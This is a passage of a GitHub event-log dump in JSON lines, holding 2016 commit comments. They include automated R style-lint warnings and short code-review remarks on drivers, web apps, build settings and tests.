two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:82:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L82) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n[R/generateArtificialData.R:83:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n              ~^~~\n```\n[R/generateArtificialData.R:83:32:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                              ~^~\n```\n[R/generateArtificialData.R:83:61:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                                                           ~^~\n```\n"}},"created_at":"2016-09-19T19:47:59Z"}
{"id":"4585497854","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084489,"position":174,"line":468,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:48:15Z","updated_at":"2016-09-19T19:48:15Z","body":"If this code sequence occurs more than once it needs to be a function."}},"created_at":"2016-09-19T19:48:15Z"}
{"id":"4585498874","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084497,"position":189,"line":485,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:48:27Z","updated_at":"2016-09-19T19:48:27Z","body":"todo: names"}},"created_at":"2016-09-19T19:48:27Z"}
{"id":"4585500534","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19084501,"position":null,"line":null,"path":null,"commit_id":"2833ac719fbf9e5ba9ae3c5dd0281adaee091909","created_at":"2016-09-19T19:48:47Z","updated_at":"2016-09-19T19:48:47Z","body":"I gave up on that.\nAnd NCurses/Curses clears the screen.\n\nOn Mon, Sep 19, 2016 at 2:41 PM, JoinRajuncraftNow <notifications@github.com\n> wrote:\n\n> Ever heard of ncurses? Its conio.h but for linux. Well, as far as I know.\n> It might be easier/faster/smaller than what you are currently doing.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/Projects/commit/2833ac719fbf9e5ba9ae3c5dd0281adaee091909#commitcomment-19083175>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOnQHUZCQBqI_vlYulHDdp8aNld130ks5qrtdcgaJpZM4KAogs>\n> .\n>\n"}},"created_at":"2016-09-19T19:48:47Z"}
{"id":"4585501579","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084511,"position":221,"line":570,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:48:59Z","updated_at":"2016-09-19T19:48:59Z","body":"Find out why the name differs. There's always a reason."}},"created_at":"2016-09-19T19:48:59Z"}
{"id":"4585501907","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084513,"position":12,"line":12,"path":"browser/js/signUp/oauth-button/oauth-button.directive.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:49:02Z","updated_at":"2016-09-19T19:49:02Z","body":"I would make sure your editor automatically adds a newline to the end of file (if not present) on save. It's a common convention and makes for annoying diffs when some team members do have it and others don't. The reason for it has to do with easier concatenation / use through Unix commands."}},"created_at":"2016-09-19T19:49:02Z"}
{"id":"4585503525","type":"CommitCommentEvent","actor":{"login":"martonbognar"},"repo":{"name":"kripod/bme-vik-info"},"payload":{"comment":{"id":19084518,"position":3,"line":3,"path":"bsc-01/prog/peldak/het-01/05-osszetett-vezerlesi-szerkezetek/szorzotabla-fejleccel/c/main.c","commit_id":"2c1f0cd2df04180d0e3b0565c527a42b65d46b88","created_at":"2016-09-19T19:49:19Z","updated_at":"2016-09-19T19:49:19Z","body":"itt csak egy fajl van, szoval ugysem szamit (egyebkent nekem a gcc mindketto eseten ugyanugy optimalizalt)\r\nfelreertes ne essek, nem akarok annyira belekotni, csak felek hogy valaki, aki most tanul eloszor c-t, belezavarodik ebbe (laboron mar volt ra pelda), foleg, hogy mas nyelvekben altalaban mast jelent a `static`, es ha jol tudom meg eloadason sem volt rola szo (ha egyaltalan lesz)"}},"created_at":"2016-09-19T19:49:19Z"}
{"id":"4585503964","type":"CommitCommentEvent","actor":{"login":"aharjula"},"repo":{"name":"maths/moodle-qtype_stack"},"payload":{"comment":{"id":19084522,"position":7,"line":272,"path":"stack/maxima/stackmaxima.mac","commit_id":"d3bae58d040ac4f5d700d324a3e38a558a4c675b","created_at":"2016-09-19T19:49:24Z","updated_at":"2016-09-19T19:49:24Z","body":"As you already do this predicate search here, why are you repeating the same search at lines 322 and 469? Is this predicate not recursive and thus searching the whole expression? In the current form you are doing a recursive search for the whole subexpression inside each recursion step of the expression, probably not bad for small things but imagine a matrix or list of a few thousand elements... If the predicate does a full search then calling it again for any subpart of expression should return false if the full expression returned false, or did I misunderstand something?"}},"created_at":"2016-09-19T19:49:24Z"}
{"id":"4585504574","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19084526,"position":null,"line":null,"path":null,"commit_id":"2833ac719fbf9e5ba9ae3c5dd0281adaee091909","created_at":"2016-09-19T19:49:32Z","updated_at":"2016-09-19T19:49:32Z","body":"Is there a windows version of ncurses?\n"}},"created_at":"2016-09-19T19:49:32Z"}
{"id":"4585506681","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084530,"position":305,"line":768,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:49:56Z","updated_at":"2016-09-19T19:49:56Z","body":"You could have a function:\r\nset_bit(address, register, bit)\r\nbecause this patter of these lines of code is all over the drivier."}},"created_at":"2016-09-19T19:49:56Z"}
{"id":"4585512414","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084544,"position":5,"line":5,"path":"browser/js/reviews/reviews.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:50:58Z","updated_at":"2016-09-19T19:50:58Z","body":"This seems contradictory; `fetchAll` but also with a specific `productId`? It sounds like you intend to fetch not all reviews, but rather all reviews for a given product. That should be a query (e.g. `GET /api/reviews?productId=123`) which you can build in Angular using the params option."}},"created_at":"2016-09-19T19:50:58Z"}
{"id":"4585514960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19084548,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-19T19:51:26Z","updated_at":"2016-09-19T19:51:26Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-MacOS-10.9-clang: OK (2326 of 2333 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T19:51:26Z"}
{"id":"4585516410","type":"CommitCommentEvent","actor":{"login":"GregoryMcGregerson"},"repo":{"name":"mkwong98/HDNes"},"payload":{"comment":{"id":19084552,"position":null,"line":null,"path":null,"commit_id":"86e6921b3339d9655f4f6917bcd4837e486f2bd0","created_at":"2016-09-19T19:51:41Z","updated_at":"2016-09-19T19:51:41Z","body":"Happy to see you working on this again man. Looking forward to all the changes you have planned out."}},"created_at":"2016-09-19T19:51:41Z"}
{"id":"4585520063","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084558,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:52:21Z","updated_at":"2016-09-19T19:52:21Z","body":"If you dont make the wrapper happy it will turn into a managed version of commproto and not a wrapper"}},"created_at":"2016-09-19T19:52:21Z"}
{"id":"4585527313","type":"CommitCommentEvent","actor":{"login":"dav-is"},"repo":{"name":"Avatar4eg/flarum-ext-share-social"},"payload":{"comment":{"id":19084580,"position":null,"line":null,"path":null,"commit_id":"1f65cda4736fc898ab503db6a6fb01257a32257f","created_at":"2016-09-19T19:53:42Z","updated_at":"2016-09-19T19:53:42Z","body":"Great improvement in redundancies. Nice work."}},"created_at":"2016-09-19T19:53:42Z"}
{"id":"4585528032","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19084581,"position":null,"line":null,"path":null,"commit_id":"a20d8e0d6eac4e258911fbc2622d3b0c7dbac78e","created_at":"2016-09-19T19:53:50Z","updated_at":"2016-09-19T19:53:50Z","body":"True."}},"created_at":"2016-09-19T19:53:50Z"}
{"id":"4585528437","type":"CommitCommentEvent","actor":{"login":"Thedigit"},"repo":{"name":"kaluax/curl"},"payload":{"comment":{"id":19084582,"position":null,"line":null,"path":null,"commit_id":"781195bf6877cfe91524321079fe891ac2931243","created_at":"2016-09-19T19:53:54Z","updated_at":"2016-09-19T19:53:54Z","body":"Hi @kaluax & @elimentz,\r\n\r\ni added the pull request to https://github.com/ixudra/curl/pull/21"}},"created_at":"2016-09-19T19:53:54Z"}
{"id":"4585528751","type":"CommitCommentEvent","actor":{"login":"mattrobenolt"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":19084584,"position":null,"line":null,"path":null,"commit_id":"12c22bbd38fe8b3a2d2953f3734e37bbd4411201","created_at":"2016-09-19T19:53:58Z","updated_at":"2016-09-19T19:53:58Z","body":":+1:"}},"created_at":"2016-09-19T19:53:58Z"}
{"id":"4585530069","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19084588,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T19:54:13Z","updated_at":"2016-09-19T19:54:13Z","body":"https://github.com/AOSP-JF-MM/platform_system_core/commit/74edcea90e31a3795e58aa1b2bbe96032f0bcd61 I fixed init in a different way but i saw that Steve made this changes on his devices like here https://github.com/CyanogenMod/android_device_oneplus_oneplus3/commit/c4821556530ff2aadb02e9ca22bb4f443e90001d so i suppose it's working, and don't think it's the root cause of our issue, props are settled correctly for GSM devices"}},"created_at":"2016-09-19T19:54:13Z"}
{"id":"4585531847","type":"CommitCommentEvent","actor":{"login":"pdanilchik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19084594,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-19T19:54:32Z","updated_at":"2016-09-19T19:54:32Z","body":"Where can a suitable DTB file be had to manually patch systems until fixed? I've been unsuccessful in locating sun8i-h3-orangepi-pc.dtb ."}},"created_at":"2016-09-19T19:54:32Z"}
{"id":"4585534161","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084598,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:55:00Z","updated_at":"2016-09-19T19:55:00Z","body":"We can't make the wrapper happy, we would instead be making a copied, mutated, version of CommProto."}},"created_at":"2016-09-19T19:55:00Z"}
{"id":"4585536519","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084602,"position":101,"line":101,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:55:26Z","updated_at":"2016-09-19T19:55:26Z","body":"`ProductsCtrl probably shouldn't have these categories hard-coded. Three possibilities, each better than the last:\r\n\r\n1. Make some kind of `app.value` containing all the categories hard-coded, and inject it.\r\n2. Make some kind of `app.factory` which *fetches* the categories from the server, and use that promise in your controllers.\r\n3. Make some kind of `app.factory` which *fetches* the categories from the server, and make any controller that needs them inject via a `resolve`.\r\n\r\nThe server can probably produce an array of categories simply by inspecting the Sequelize model ENUM. I don't know offhand where it can get that data but I am 100% sure it's possible."}},"created_at":"2016-09-19T19:55:26Z"}
{"id":"4585537740","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084605,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:55:39Z","updated_at":"2016-09-19T19:55:39Z","body":"In other words, we would have to copy the commproto lib over to wrapper library and use that to modify the source."}},"created_at":"2016-09-19T19:55:39Z"}
{"id":"4585539465","type":"CommitCommentEvent","actor":{"login":"MeikelLP"},"repo":{"name":"Badeye/Impulse"},"payload":{"comment":{"id":19084607,"position":null,"line":null,"path":null,"commit_id":"962985f68cc95083bda9e0befc06724a61d40341","created_at":"2016-09-19T19:56:00Z","updated_at":"2016-09-19T19:56:00Z","body":"Nice"}},"created_at":"2016-09-19T19:56:00Z"}
{"id":"4585540609","type":"CommitCommentEvent","actor":{"login":"dav-is"},"repo":{"name":"Avatar4eg/flarum-ext-share-social"},"payload":{"comment":{"id":19084610,"position":64,"line":84,"path":"src/Listener/AddHeadData.php","commit_id":"1f65cda4736fc898ab503db6a6fb01257a32257f","created_at":"2016-09-19T19:56:12Z","updated_at":"2016-09-19T19:56:12Z","body":"Worried this will add a lot of headers as it's repeated throughout the code. The ConfigureClientView event runs once and the PrepareApiData runs (from what I've seen) around 3 times. That's 4 sets total of Twitter headers and 4 sets of open graph."}},"created_at":"2016-09-19T19:56:12Z"}
{"id":"4585543770","type":"CommitCommentEvent","actor":{"login":"roblox-daddy42"},"repo":{"name":"MobileAppsPer4/HelloWorld"},"payload":{"comment":{"id":19084617,"position":3,"line":3,"path":"README.md","commit_id":"6a08aa6a0ae1571aa65ed3839f1e5fcf8ebee437","created_at":"2016-09-19T19:56:47Z","updated_at":"2016-09-19T19:56:47Z","body":"wtf\r\n"}},"created_at":"2016-09-19T19:56:47Z"}
{"id":"4585545035","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"fabric8io/elasticsearch-cloud-kubernetes"},"payload":{"comment":{"id":19084621,"position":64,"line":174,"path":"pom.xml","commit_id":"ec06ed57c51bb3fd0ed7331d1f9fac27f6e89c3a","created_at":"2016-09-19T19:57:01Z","updated_at":"2016-09-19T19:57:01Z","body":"@jimmidyson Is this necessary?  This means we have to use java 1.8 to build?  Can we use 1.7?  If not, can we build with 1.8 and use 1.7 at runtime?"}},"created_at":"2016-09-19T19:57:01Z"}
{"id":"4585546976","type":"CommitCommentEvent","actor":{"login":"mhomolak"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19084624,"position":null,"line":null,"path":null,"commit_id":"4a8cdf18770b79e09b7363e5c8d6f32c7290ae58","created_at":"2016-09-19T19:57:23Z","updated_at":"2016-09-19T19:57:23Z","body":"Code review for slider component - \r\n@aaronkaka @wyseguyonline @JasonLantz @umahaea @StommePoes "}},"created_at":"2016-09-19T19:57:23Z"}
{"id":"4585547216","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084625,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:57:26Z","updated_at":"2016-09-19T19:57:26Z","body":"I don't want that, nor do i want to modify commproto just for the wrapper."}},"created_at":"2016-09-19T19:57:26Z"}
{"id":"4585548981","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084631,"position":83,"line":83,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:57:46Z","updated_at":"2016-09-19T19:57:46Z","body":"Consider registering this as an actual `angular.filter`. Clean up the controller a bit and makes it reusable, plus makes the template slightly more elegant looking."}},"created_at":"2016-09-19T19:57:46Z"}
{"id":"4585549531","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19084633,"position":null,"line":null,"path":null,"commit_id":"f30c9499b62e4959d8265b1e22401702f073aa15","created_at":"2016-09-19T19:57:52Z","updated_at":"2016-09-19T19:57:52Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/f30c9499b62e4959d8265b1e22401702f073aa15#commitcomment-19082011) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/468360870dcdecc687e2ce749e313a8d6e074e97/f30c949_vs_e781d08/report.md). cc @jrevels"}},"created_at":"2016-09-19T19:57:52Z"}
{"id":"4585552605","type":"CommitCommentEvent","actor":{"login":"bsekisser"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":19084641,"position":null,"line":null,"path":null,"commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-19T19:58:28Z","updated_at":"2016-09-19T19:58:28Z","body":"Been a while...  to note...  that I recall what is here gets the timers started correctly...  It looked as if the error was actually occuring elsewhere...  not sure if it was indirectly related to chances made...  ie a value changed use or something else that got uncovered."}},"created_at":"2016-09-19T19:58:28Z"}
{"id":"4585554625","type":"CommitCommentEvent","actor":{"login":"sebix"},"repo":{"name":"rthalley/dnspython"},"payload":{"comment":{"id":19084645,"position":5,"line":18,"path":".travis.yml","commit_id":"58e84f91047966ad36562cd19bd89c38680f3d8c","created_at":"2016-09-19T19:58:50Z","updated_at":"2016-09-19T19:58:50Z","body":"2.6, 2.7 are very special and not easy to support, thus I'd include them. Also, 3.3 is our lowest 3.x. -> I'd recommend to only not test 3.4 explicitly.\r\n\r\nBut we can enable fast-failures, so the overall test fails as soon as the first non-allowed job fails."}},"created_at":"2016-09-19T19:58:50Z"}
{"id":"4585555814","type":"CommitCommentEvent","actor":{"login":"ZakariyaTV"},"repo":{"name":"atom/atom"},"payload":{"comment":{"id":19084648,"position":null,"line":null,"path":null,"commit_id":"3a09528a62f29e86bc15140a13d1bdbd9322e0e9","created_at":"2016-09-19T19:59:00Z","updated_at":"2016-09-19T19:59:00Z","body":"Little did he know that this would become then best code editor out there!"}},"created_at":"2016-09-19T19:59:00Z"}
{"id":"4585556768","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084650,"position":64,"line":64,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:59:13Z","updated_at":"2016-09-19T19:59:13Z","body":"The complexity of this method again underscores the value of a `CartFactory`."}},"created_at":"2016-09-19T19:59:13Z"}
{"id":"4585556921","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19084651,"position":19,"line":17,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"aac25e2b84e76da1b0ba2d269e0c6ec4bc061b8a","created_at":"2016-09-19T19:59:15Z","updated_at":"2016-09-19T19:59:15Z","body":"new Room[3][30] ? Тебе нужно объединить результат от трех API.  Представь, что ты ищешь квартиру и перед тем, как обзваниваешь, выписываешь все  из трех газет на один лист бумаги."}},"created_at":"2016-09-19T19:59:15Z"}
{"id":"4585559170","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19084657,"position":null,"line":null,"path":null,"commit_id":"22d6e31fc6a9de2ee424984e629ccd2e394ba512","created_at":"2016-09-19T19:59:40Z","updated_at":"2016-09-19T19:59:40Z","body":"From a quick read I believe that it's (hashed as) just a pseudo-random string that only depends on the output name. For example, if you put `echo /1rz4g4znpzjwh1xymhjpm42vipw92pr73vdgl6xs1hycac8kf2n9` instead of `echo ${placeholder \"out\"}`, it should always result into the same hash and derivation. Such approach seems unlikely to cause trouble *unless*/until an adversary can control (part of) the derivation text."}},"created_at":"2016-09-19T19:59:40Z"}
{"id":"4585560329","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19084660,"position":6,"line":10,"path":"country_filter.rb","commit_id":"5683ff65925990d7820ed3f951723b5f2b84aa02","created_at":"2016-09-19T19:59:53Z","updated_at":"2016-09-19T19:59:53Z","body":"Нет. Мы обсуждали, зечем нужен `respond_to_missing?` — он должен чётко говорить `trrue` если такой метод есть, и `false` в другом случае."}},"created_at":"2016-09-19T19:59:53Z"}
{"id":"4581078715","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"LinsanityDu/AndroidPractice"},"payload":{"comment":{"id":19073124,"position":null,"line":null,"path":null,"commit_id":"725dcb5e943e33604f05786f1fe87976425e5c30","created_at":"2016-09-19T02:08:09Z","updated_at":"2016-09-19T02:08:09Z","body":"LGTM\r\nShip it !\r\nGumma !!!!!!!!"}},"created_at":"2016-09-19T02:08:09Z"}
{"id":"4581079434","type":"CommitCommentEvent","actor":{"login":"chenkk69"},"repo":{"name":"hayageek/jquery-upload-file"},"payload":{"comment":{"id":19073126,"position":null,"line":null,"path":null,"commit_id":"3be55e3e983b3fdd8b0c96b3f67e2e8aa67066e3","created_at":"2016-09-19T02:08:31Z","updated_at":"2016-09-19T02:08:31Z","body":"[自助理賠管理端.xlsx](https://github.com/hayageek/jquery-upload-file/files/479140/default.xlsx)\r\n"}},"created_at":"2016-09-19T02:08:31Z"}
{"id":"4581079632","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"th27/dsp"},"payload":{"comment":{"id":19073127,"position":null,"line":null,"path":null,"commit_id":"6ef00e6bb3d12b5a6d456ff2a3b8a0bbff90d561","created_at":"2016-09-19T02:08:39Z","updated_at":"2016-09-19T02:08:39Z","body":"Hey Taichi,\r\nVery good work on these exercises 👍, you crushed it. I should have advanced python finished by the end of the week. See you in class Wednesday!"}},"created_at":"2016-09-19T02:08:39Z"}
{"id":"4581079988","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19073129,"position":4,"line":10774,"path":"pkgs/top-level/all-packages.nix","commit_id":"5650c92b019fa8ecc1dd37ecfd77cdd72f406da7","created_at":"2016-09-19T02:08:50Z","updated_at":"2016-09-19T02:08:50Z","body":"The path is wrong so this causes an eval error.\r\n\r\nAlso this `.bin // { outputs = [\"bin\"]; };` hack is no longer needed."}},"created_at":"2016-09-19T02:08:50Z"}
{"id":"4581080636","type":"CommitCommentEvent","actor":{"login":"ssharma"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19073132,"position":null,"line":null,"path":null,"commit_id":"a75455ef49c22a7fa45e00b7ad35802550d57254","created_at":"2016-09-19T02:09:09Z","updated_at":"2016-09-19T02:09:09Z","body":"@davsclaus  Can you please pass on Camel code CS template? "}},"created_at":"2016-09-19T02:09:09Z"}
